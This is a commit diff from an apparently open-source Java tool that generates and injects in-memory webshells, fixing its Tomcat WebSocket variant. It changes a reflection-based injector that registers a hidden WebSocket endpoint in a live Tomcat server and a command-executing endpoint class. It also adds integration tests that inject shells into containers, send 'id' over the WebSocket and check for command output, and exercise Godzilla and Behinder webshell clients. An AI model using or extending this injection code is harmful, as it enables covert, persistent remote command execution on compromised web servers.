fix: tomcat WebSocket shell not work (#25)

This commit is contained in:
ReaJason
2025-02-25 00:11:16 +08:00
parent 5b838adbe9
commit 85828f7975
5 changed files with 82 additions and 20 deletions
@@ -9,6 +9,7 @@ import com.reajason.javaweb.memshell.config.CommandConfig;
import com.reajason.javaweb.memshell.config.ShellConfig; import com.reajason.javaweb.memshell.config.ShellConfig;
import net.bytebuddy.ByteBuddy; import net.bytebuddy.ByteBuddy;
import net.bytebuddy.dynamic.DynamicType; import net.bytebuddy.dynamic.DynamicType;
import org.apache.commons.lang3.StringUtils;
import java.util.HashMap; import java.util.HashMap;
@@ -38,14 +39,17 @@ public class CommandGenerator {
builder = LogRemoveMethodVisitor.extend(builder); builder = LogRemoveMethodVisitor.extend(builder);
} }
if (config.getShellType().startsWith(ShellType.AGENT)) { String shellType = config.getShellType();
builder = builder.visit( if (!ShellType.WEBSOCKET.equals(shellType)) {
new LdcReAssignVisitorWrapper(new HashMap<Object, Object>(3) {{ if (StringUtils.startsWith(shellType, ShellType.AGENT)) {
put("paramName", shellConfig.getParamName()); builder = builder.visit(
}}) new LdcReAssignVisitorWrapper(new HashMap<Object, Object>(1) {{
); put("paramName", shellConfig.getParamName());
} else { }})
builder = builder.field(named("paramName")).value(shellConfig.getParamName()); );
} else {
builder = builder.field(named("paramName")).value(shellConfig.getParamName());
}
} }
try (DynamicType.Unloaded<?> make = builder.make()) { try (DynamicType.Unloaded<?> make = builder.make()) {
@@ -13,7 +13,9 @@ import okhttp3.HttpUrl;
import okhttp3.OkHttpClient; import okhttp3.OkHttpClient;
import okhttp3.Request; import okhttp3.Request;
import okhttp3.Response; import okhttp3.Response;
import org.junit.jupiter.api.Assumptions; import org.java_websocket.client.WebSocketClient;
import org.java_websocket.handshake.ServerHandshake;
import org.junit.jupiter.api.Test;
import org.testcontainers.containers.GenericContainer; import org.testcontainers.containers.GenericContainer;
import org.testcontainers.shaded.org.apache.commons.io.FileUtils; import org.testcontainers.shaded.org.apache.commons.io.FileUtils;
import org.testcontainers.shaded.org.apache.commons.lang3.RandomStringUtils; import org.testcontainers.shaded.org.apache.commons.lang3.RandomStringUtils;
@@ -21,16 +23,18 @@ import org.testcontainers.shaded.org.apache.commons.lang3.StringUtils;
import org.testcontainers.utility.MountableFile; import org.testcontainers.utility.MountableFile;
import java.io.IOException; import java.io.IOException;
import java.net.URI;
import java.net.URL;
import java.nio.file.Files; import java.nio.file.Files;
import java.nio.file.Path; import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Objects; import java.util.Objects;
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.TimeUnit;
import static org.hamcrest.CoreMatchers.anyOf; import static org.hamcrest.CoreMatchers.anyOf;
import static org.hamcrest.CoreMatchers.containsString; import static org.hamcrest.CoreMatchers.containsString;
import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.MatcherAssert.assertThat;
import static org.junit.jupiter.api.Assertions.assertDoesNotThrow; import static org.junit.jupiter.api.Assertions.*;
import static org.junit.jupiter.api.Assertions.assertTrue;
/** /**
* @author ReaJason * @author ReaJason
@@ -57,6 +61,12 @@ public class ShellAssertionTool {
shellUrl = url + urlPattern; shellUrl = url + urlPattern;
} }
if (shellType.equals(ShellType.WEBSOCKET)) {
urlPattern = "/" + shellTool + shellType + packer.name();
URL url1 = new URL(url);
shellUrl = "ws://" + url1.getHost() + ":" + url1.getPort() + url1.getPath() + urlPattern;
}
GenerateResult generateResult = generate(urlPattern, server, shellType, shellTool, targetJdkVersion, packer); GenerateResult generateResult = generate(urlPattern, server, shellType, shellTool, targetJdkVersion, packer);
String content = null; String content = null;
@@ -87,7 +97,11 @@ public class ShellAssertionTool {
testGodzillaIsOk(shellUrl, ((GodzillaConfig) generateResult.getShellToolConfig())); testGodzillaIsOk(shellUrl, ((GodzillaConfig) generateResult.getShellToolConfig()));
break; break;
case Command: case Command:
testCommandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig())); if (shellType.equals(ShellType.WEBSOCKET)) {
testWebSocketCommandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig()));
} else {
testCommandIsOk(shellUrl, ((CommandConfig) generateResult.getShellToolConfig()));
}
break; break;
case Behinder: case Behinder:
testBehinderIsOk(shellUrl, ((BehinderConfig) generateResult.getShellToolConfig())); testBehinderIsOk(shellUrl, ((BehinderConfig) generateResult.getShellToolConfig()));
@@ -131,6 +145,50 @@ public class ShellAssertionTool {
} }
} }
@Test
void name() throws Exception {
testWebSocketCommandIsOk("ws://localhost:8082/app/hello", null);
}
public static void testWebSocketCommandIsOk(String entrypoint, CommandConfig shellConfig) throws Exception {
final CountDownLatch latch = new CountDownLatch(1);
final String[] responseHolder = new String[1];
final long timeout = 5;
WebSocketClient client = new WebSocketClient(new URI(entrypoint)) {
@Override
public void onOpen(ServerHandshake data) {
send("id");
}
@Override
public void onMessage(String message) {
responseHolder[0] = message;
latch.countDown();
close();
}
@Override
public void onClose(int code, String reason, boolean remote) {
}
@Override
public void onError(Exception ex) {
}
};
client.connect();
boolean connected = latch.await(timeout, TimeUnit.SECONDS);
if (!connected) {
fail("连接超时,未能成功连接到 WebSocket 服务器");
}
String res = responseHolder[0];
System.out.println(res);
assertTrue(res.contains("uid="));
}
public static void testBehinderIsOk(String entrypoint, BehinderConfig shellConfig) { public static void testBehinderIsOk(String entrypoint, BehinderConfig shellConfig) {
BehinderManager behinderManager = BehinderManager.builder() BehinderManager behinderManager = BehinderManager.builder()
.entrypoint(entrypoint).pass(shellConfig.getPass()) .entrypoint(entrypoint).pass(shellConfig.getPass())
@@ -167,7 +225,7 @@ public class ShellAssertionTool {
.build(); .build();
ShellToolConfig shellToolConfig = null; ShellToolConfig shellToolConfig = null;
String uniqueName = shellTool + RandomStringUtils.randomAlphabetic(5)+ shellType + RandomStringUtils.randomAlphabetic(5)+ packer.name(); String uniqueName = shellTool + RandomStringUtils.randomAlphabetic(5) + shellType + RandomStringUtils.randomAlphabetic(5) + packer.name();
switch (shellTool) { switch (shellTool) {
case Godzilla: case Godzilla:
String godzillaPass = "pass"; String godzillaPass = "pass";
@@ -1,10 +1,10 @@
package com.reajason.javaweb.integration.tomcat; package com.reajason.javaweb.integration.tomcat;
import com.reajason.javaweb.integration.TestCasesProvider; import com.reajason.javaweb.integration.TestCasesProvider;
import com.reajason.javaweb.memshell.ShellType; import com.reajason.javaweb.memshell.Packers;
import com.reajason.javaweb.memshell.Server; import com.reajason.javaweb.memshell.Server;
import com.reajason.javaweb.memshell.ShellTool; import com.reajason.javaweb.memshell.ShellTool;
import com.reajason.javaweb.memshell.Packers; import com.reajason.javaweb.memshell.ShellType;
import lombok.extern.slf4j.Slf4j; import lombok.extern.slf4j.Slf4j;
import net.bytebuddy.jar.asm.Opcodes; import net.bytebuddy.jar.asm.Opcodes;
import org.junit.jupiter.api.AfterAll; import org.junit.jupiter.api.AfterAll;
@@ -23,7 +23,6 @@ import static com.reajason.javaweb.integration.ContainerTool.*;
import static com.reajason.javaweb.integration.DoesNotContainExceptionMatcher.doesNotContainException; import static com.reajason.javaweb.integration.DoesNotContainExceptionMatcher.doesNotContainException;
import static com.reajason.javaweb.integration.ShellAssertionTool.testShellInjectAssertOk; import static com.reajason.javaweb.integration.ShellAssertionTool.testShellInjectAssertOk;
import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.MatcherAssert.assertThat;
import static org.junit.jupiter.params.provider.Arguments.arguments;
/** /**
* @author ReaJason * @author ReaJason
@@ -44,7 +43,7 @@ public class Tomcat8ContainerTest {
static Stream<Arguments> casesProvider() { static Stream<Arguments> casesProvider() {
Server server = Server.Tomcat; Server server = Server.Tomcat;
Set<String> supportedShellTypes = Set.of(ShellType.FILTER, ShellType.LISTENER, ShellType.VALVE, Set<String> supportedShellTypes = Set.of(ShellType.FILTER, ShellType.LISTENER, ShellType.VALVE, ShellType.WEBSOCKET,
ShellType.AGENT_FILTER_CHAIN, ShellType.CATALINA_AGENT_CONTEXT_VALVE); ShellType.AGENT_FILTER_CHAIN, ShellType.CATALINA_AGENT_CONTEXT_VALVE);
Set<Packers> testPackers = Set.of(Packers.JSP, Packers.JSPX, Packers.JavaDeserialize); Set<Packers> testPackers = Set.of(Packers.JSP, Packers.JSPX, Packers.JavaDeserialize);
return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers); return TestCasesProvider.getTestCases(imageName, server, supportedShellTypes, testPackers);
@@ -87,7 +87,7 @@ public class TomcatWebSocketInjector {
@SuppressWarnings("unchecked") @SuppressWarnings("unchecked")
private void inject(Object context, Object obj) throws Exception { private void inject(Object obj, Object context) throws Exception {
Object servletContext = invokeMethod(context, "getServletContext", null, null); Object servletContext = invokeMethod(context, "getServletContext", null, null);
Object container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"javax.websocket.server.ServerContainer"}); Object container = invokeMethod(servletContext, "getAttribute", new Class[]{String.class}, new Object[]{"javax.websocket.server.ServerContainer"});
if (container == null) { if (container == null) {
@@ -103,9 +103,11 @@ public class TomcatWebSocketInjector {
Map<String, Object> o = (Map<String, Object>) getFieldValue(container, "configExactMatchMap"); Map<String, Object> o = (Map<String, Object>) getFieldValue(container, "configExactMatchMap");
if (o.containsKey(getUrlPattern())) { if (o.containsKey(getUrlPattern())) {
System.out.println("websocket at " + getUrlPattern() + " already exists");
return; return;
} }
invokeMethod(container, "addEndpoint", new Class[]{serverEndpointConfigClass}, new Object[]{endpointConfig}); invokeMethod(container, "addEndpoint", new Class[]{serverEndpointConfigClass}, new Object[]{endpointConfig});
System.out.println("websocket at " + getUrlPattern() + " inject successfully");
} }
@SuppressWarnings("all") @SuppressWarnings("all")
@@ -14,7 +14,6 @@ import java.io.InputStream;
*/ */
public class CommandWebSocket extends Endpoint implements MessageHandler.Whole<String> { public class CommandWebSocket extends Endpoint implements MessageHandler.Whole<String> {
public static String paramName;
private Session session; private Session session;
@Override @Override